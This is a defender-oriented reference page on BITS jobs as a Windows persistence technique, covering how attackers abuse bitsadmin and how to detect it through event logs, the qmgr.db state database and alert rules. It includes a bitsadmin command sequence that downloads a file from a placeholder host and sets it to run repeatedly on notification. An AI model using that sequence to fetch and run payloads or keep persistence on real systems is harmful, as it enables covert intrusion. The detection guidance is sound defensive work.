Skip to content
Reverse Engineering
Persistencebeginner

BITS Jobs Persistence

Malware creates a Background Intelligent Transfer Service job that downloads and executes a payload on a trigger, abusing a trusted Windows service.

The Background Intelligent Transfer Service (BITS) is a legitimate Windows component that performs throttled, resumable file transfers in the background — it is what Windows Update and many installers use. BITS jobs are managed through the bitsadmin tool and the Start-BitsTransfer PowerShell cmdlet, and crucially a job can be configured to run an arbitrary command when the transfer completes or when an error occurs.

Attackers abuse this in two ways. First, BITS provides a stealthy download channel that blends into normal background network traffic and is handled by a trusted service process. Second, the job's SetNotifyCmdLine option turns BITS into a persistence and execution mechanism: the job can be set to re-run indefinitely with a long retry window, relaunching the attacker's command each time it fires. Because the work is brokered by svchost.exe hosting the BITS service rather than the malware's own process, the activity is easy to overlook.

BITS jobs survive reboots and can be created without administrative rights, which makes this a popular low-effort persistence choice for commodity loaders.

How it works

A persistence job is created and configured to run a command on notification, then resumed:

text
bitsadmin /create updater
bitsadmin /addfile updater http://example/p.dat C:\Users\Public\p.dat
bitsadmin /SetNotifyCmdLine updater C:\Users\Public\p.exe NULL
bitsadmin /SetMinRetryDelay updater 60
bitsadmin /resume updater

The job's state — including the notify command line, file list, and retry timing — is stored in the BITS state database under %ALLUSERSPROFILE%\Microsoft\Network\Downloader\ (the qmgr.db / legacy qmgr0.dat files). The load-bearing artifacts are the job name, the remote URL, and the SetNotifyCmdLine target.

Detection & analysis

Static analysis:

  • In a captured sample, look for bitsadmin.exe command-line strings, the Start-BitsTransfer cmdlet, or direct use of the BITS COM interface (IBackgroundCopyManager, CLSID {4991D34B-80A1-4291-83B6-3328366B9097}). Strings such as SetNotifyCmdLine indicate execution intent, not just download.
  • Triage a live or imaged host by parsing the BITS state database (qmgr.db) with BitsParser or a forensics suite; long-lived jobs with a notify command line pointing at a user-writable binary are suspicious.
  • Review the Microsoft-Windows-Bits-Client/Operational event log offline for created and resumed jobs and their associated URLs.

Dynamic analysis:

  • Run the sample and monitor the Bits-Client/Operational log live: Event ID 3 logs job creation with the URL, and Event ID 59/60 record transfer start/stop. Correlate with Sysmon Event ID 1 to catch the notify command being spawned by the BITS service host.
  • Watch for svchost.exe (hosting the BITS service) as the parent of an unexpected child process, or for bitsadmin.exe invoked with /SetNotifyCmdLine or /addfile arguments.

Detection rule hint:

Alert on bitsadmin.exe command lines containing /SetNotifyCmdLine, /addfile with an external URL, or unusually long /SetMinRetryDelay values, and on Start-BitsTransfer from script interpreters. The highest-signal indicator is a BITS job whose notify command line points to a binary in %AppData%, %Temp%, or %Public%.

Votes

Comments(0)